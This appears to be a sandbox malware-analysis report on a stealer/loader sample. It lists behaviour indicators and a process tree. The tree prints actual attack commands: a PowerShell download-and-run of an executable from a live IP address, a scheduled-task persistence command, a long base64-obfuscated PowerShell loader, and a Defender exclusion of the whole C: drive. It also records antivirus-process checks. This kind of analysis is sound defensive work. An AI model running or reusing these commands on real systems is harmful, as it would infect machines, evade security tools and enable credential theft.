Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2268 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1544 powershell.exe 1544 powershell.exe 2736 TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE 2736 TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE 3592 rapes.exe 3592 rapes.exe 2268 powershell.exe 2268 powershell.exe 2268 powershell.exe 4024 powershell.exe 4024 powershell.exe 4024 powershell.exe 2832 Rm3cVPI.exe 2832 Rm3cVPI.exe 2832 Rm3cVPI.exe 2832 Rm3cVPI.exe 6128 MSBuild.exe 6128 MSBuild.exe 6128 MSBuild.exe 6128 MSBuild.exe 4588 fontdrvhost.exe 4588 fontdrvhost.exe 4588 fontdrvhost.exe 4588 fontdrvhost.exe 3956 rapes.exe 3956 rapes.exe 4580 powershell.exe 4580 powershell.exe 4580 powershell.exe 2380 Passwords.com 2380 Passwords.com 2380 Passwords.com 2380 Passwords.com 2380 Passwords.com 2380 Passwords.com 4472 17309ae496.exe 4472 17309ae496.exe 6720 powershell.exe 6720 powershell.exe 6720 powershell.exe 7048 MSBuild.exe 7048 MSBuild.exe 7048 MSBuild.exe 7048 MSBuild.exe 5352 eea22fbd05.exe 5352 eea22fbd05.exe 5352 eea22fbd05.exe 5352 eea22fbd05.exe 5352 eea22fbd05.exe 5352 eea22fbd05.exe 7508 bd762c8745.exe 7508 bd762c8745.exe 7508 bd762c8745.exe 7508 bd762c8745.exe 7816 ae27dc3fa3.exe 7816 ae27dc3fa3.exe 7816 ae27dc3fa3.exe 7816 ae27dc3fa3.exe 7816 ae27dc3fa3.exe 7816 ae27dc3fa3.exe 2672 4258008d71.exe 2672 4258008d71.exe 12780 rapes.exe 12780 rapes.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 3648 tzutil.exe 3188 81a4e8fe.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 5724 u75a1_003.exe 5724 u75a1_003.exe 5724 u75a1_003.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 1544 powershell.exe Token: SeDebugPrivilege 2268 powershell.exe Token: SeDebugPrivilege 4024 powershell.exe Token: SeDebugPrivilege 4580 powershell.exe Token: SeDebugPrivilege 4256 tasklist.exe Token: SeDebugPrivilege 5212 tasklist.exe Token: SeLoadDriverPrivilege 3648 tzutil.exe Token: SeDebugPrivilege 6720 powershell.exe Token: SeDebugPrivilege 3188 81a4e8fe.exe Token: SeBackupPrivilege 3188 81a4e8fe.exe Token: SeRestorePrivilege 3188 81a4e8fe.exe Token: SeLoadDriverPrivilege 3188 81a4e8fe.exe Token: SeShutdownPrivilege 3188 81a4e8fe.exe Token: SeSystemEnvironmentPrivilege 3188 81a4e8fe.exe Token: SeSecurityPrivilege 3188 81a4e8fe.exe Token: SeDebugPrivilege 12400 taskkill.exe Token: SeDebugPrivilege 6312 taskkill.exe Token: SeDebugPrivilege 12244 taskkill.exe Token: SeDebugPrivilege 12128 taskkill.exe Token: SeDebugPrivilege 12028 taskkill.exe Token: SeDebugPrivilege 11864 firefox.exe Token: SeDebugPrivilege 11864 firefox.exe Token: SeDebugPrivilege 10540 27b80601f6.exe -
Suspicious use of FindShellTrayWindow 35 IoCs
pid Process 5512 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5512 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5512 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2380 Passwords.com 2380 Passwords.com 2380 Passwords.com 12444 44f5ba506b.exe 12444 44f5ba506b.exe 12444 44f5ba506b.exe 12444 44f5ba506b.exe 12444 44f5ba506b.exe 12444 44f5ba506b.exe 12444 44f5ba506b.exe 12444 44f5ba506b.exe 11864 firefox.exe 12444 44f5ba506b.exe 11864 firefox.exe 11864 firefox.exe 11864 firefox.exe 11864 firefox.exe 11864 firefox.exe 11864 firefox.exe 11864 firefox.exe 11864 firefox.exe 11864 firefox.exe 11864 firefox.exe 11864 firefox.exe 11864 firefox.exe 11864 firefox.exe 11864 firefox.exe 11864 firefox.exe 11864 firefox.exe 12444 44f5ba506b.exe 12444 44f5ba506b.exe 11864 firefox.exe -
Suspicious use of SendNotifyMessage 29 IoCs
pid Process 5512 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5512 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5512 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2380 Passwords.com 2380 Passwords.com 2380 Passwords.com 12444 44f5ba506b.exe 12444 44f5ba506b.exe 12444 44f5ba506b.exe 12444 44f5ba506b.exe 12444 44f5ba506b.exe 12444 44f5ba506b.exe 12444 44f5ba506b.exe 12444 44f5ba506b.exe 12444 44f5ba506b.exe 11864 firefox.exe 11864 firefox.exe 11864 firefox.exe 11864 firefox.exe 11864 firefox.exe 11864 firefox.exe 11864 firefox.exe 11864 firefox.exe 11864 firefox.exe 11864 firefox.exe 11864 firefox.exe 11864 firefox.exe 12444 44f5ba506b.exe 12444 44f5ba506b.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 11864 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5512 wrote to memory of 6088 5512 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 5512 wrote to memory of 6088 5512 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 5512 wrote to memory of 6088 5512 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 5512 wrote to memory of 5784 5512 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 89 PID 5512 wrote to memory of 5784 5512 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 89 PID 5512 wrote to memory of 5784 5512 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 89 PID 6088 wrote to memory of 3064 6088 cmd.exe 91 PID 6088 wrote to memory of 3064 6088 cmd.exe 91 PID 6088 wrote to memory of 3064 6088 cmd.exe 91 PID 5784 wrote to memory of 1544 5784 mshta.exe 93 PID 5784 wrote to memory of 1544 5784 mshta.exe 93 PID 5784 wrote to memory of 1544 5784 mshta.exe 93 PID 1544 wrote to memory of 2736 1544 powershell.exe 100 PID 1544 wrote to memory of 2736 1544 powershell.exe 100 PID 1544 wrote to memory of 2736 1544 powershell.exe 100 PID 2736 wrote to memory of 3592 2736 TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE 101 PID 2736 wrote to memory of 3592 2736 TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE 101 PID 2736 wrote to memory of 3592 2736 TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE 101 PID 3592 wrote to memory of 2512 3592 rapes.exe 105 PID 3592 wrote to memory of 2512 3592 rapes.exe 105 PID 2512 wrote to memory of 5092 2512 kO2IdCz.exe 106 PID 2512 wrote to memory of 5092 2512 kO2IdCz.exe 106 PID 1932 wrote to memory of 5732 1932 cmd.exe 110 PID 1932 wrote to memory of 5732 1932 cmd.exe 110 PID 5092 wrote to memory of 5748 5092 cmd.exe 111 PID 5092 wrote to memory of 5748 5092 cmd.exe 111 PID 3592 wrote to memory of 3204 3592 rapes.exe 112 PID 3592 wrote to memory of 3204 3592 rapes.exe 112 PID 3592 wrote to memory of 3204 3592 rapes.exe 112 PID 3204 wrote to memory of 4388 3204 cmd.exe 114 PID 3204 wrote to memory of 4388 3204 cmd.exe 114 PID 3204 wrote to memory of 4388 3204 cmd.exe 114 PID 4388 wrote to memory of 2268 4388 cmd.exe 116 PID 4388 wrote to memory of 2268 4388 cmd.exe 116 PID 4388 wrote to memory of 2268 4388 cmd.exe 116 PID 2268 wrote to memory of 4024 2268 powershell.exe 117 PID 2268 wrote to memory of 4024 2268 powershell.exe 117 PID 2268 wrote to memory of 4024 2268 powershell.exe 117 PID 3592 wrote to memory of 2832 3592 rapes.exe 119 PID 3592 wrote to memory of 2832 3592 rapes.exe 119 PID 3592 wrote to memory of 2832 3592 rapes.exe 119 PID 3592 wrote to memory of 5388 3592 rapes.exe 120 PID 3592 wrote to memory of 5388 3592 rapes.exe 120 PID 5388 wrote to memory of 6128 5388 TbV75ZR.exe 121 PID 5388 wrote to memory of 6128 5388 TbV75ZR.exe 121 PID 5388 wrote to memory of 6128 5388 TbV75ZR.exe 121 PID 5388 wrote to memory of 6128 5388 TbV75ZR.exe 121 PID 5388 wrote to memory of 6128 5388 TbV75ZR.exe 121 PID 5388 wrote to memory of 6128 5388 TbV75ZR.exe 121 PID 5388 wrote to memory of 6128 5388 TbV75ZR.exe 121 PID 5388 wrote to memory of 6128 5388 TbV75ZR.exe 121 PID 5388 wrote to memory of 6128 5388 TbV75ZR.exe 121 PID 5388 wrote to memory of 6128 5388 TbV75ZR.exe 121 PID 6128 wrote to memory of 4588 6128 MSBuild.exe 122 PID 6128 wrote to memory of 4588 6128 MSBuild.exe 122 PID 6128 wrote to memory of 4588 6128 MSBuild.exe 122 PID 6128 wrote to memory of 4588 6128 MSBuild.exe 122 PID 6128 wrote to memory of 4588 6128 MSBuild.exe 122 PID 3592 wrote to memory of 4844 3592 rapes.exe 128 PID 3592 wrote to memory of 4844 3592 rapes.exe 128 PID 3592 wrote to memory of 4844 3592 rapes.exe 128 PID 4844 wrote to memory of 6112 4844 7IIl2eE.exe 129 PID 4844 wrote to memory of 6112 4844 7IIl2eE.exe 129 PID 4844 wrote to memory of 6112 4844 7IIl2eE.exe 129 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:972
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4588
-
-
C:\Users\Admin\AppData\Local\Temp\2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5512 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn YJ24qma8vr5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\Hv5aLoGKt.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:6088 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn YJ24qma8vr5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\Hv5aLoGKt.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3064
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\Hv5aLoGKt.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5784 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Users\Admin\AppData\Local\TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE"C:\Users\Admin\AppData\Local\TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3592 -
C:\Users\Admin\AppData\Local\Temp\10381750101\kO2IdCz.exe"C:\Users\Admin\AppData\Local\Temp\10381750101\kO2IdCz.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c 67e8f4de3ad1d.vbs7⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e8f4de3ad1d.vbs"8⤵PID:5748
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10381761121\5YB5L4K.cmd"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3204 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10381761121\5YB5L4K.cmd"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4388 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4024
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381770101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10381770101\Rm3cVPI.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2832
-
-
C:\Users\Admin\AppData\Local\Temp\10381780101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10381780101\TbV75ZR.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5388 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:6128 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6128 -s 5048⤵
- Program crash
PID:4836
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381790101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10381790101\7IIl2eE.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4844 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat7⤵
- System Location Discovery: System Language Discovery
PID:6112 -
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4256
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"8⤵
- System Location Discovery: System Language Discovery
PID:2400
-
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5212
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"8⤵
- System Location Discovery: System Language Discovery
PID:5692
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4183778⤵
- System Location Discovery: System Language Discovery
PID:5912
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab8⤵
- System Location Discovery: System Language Discovery
PID:1456
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation8⤵
- System Location Discovery: System Language Discovery
PID:5992
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com8⤵
- System Location Discovery: System Language Discovery
PID:6140
-
-
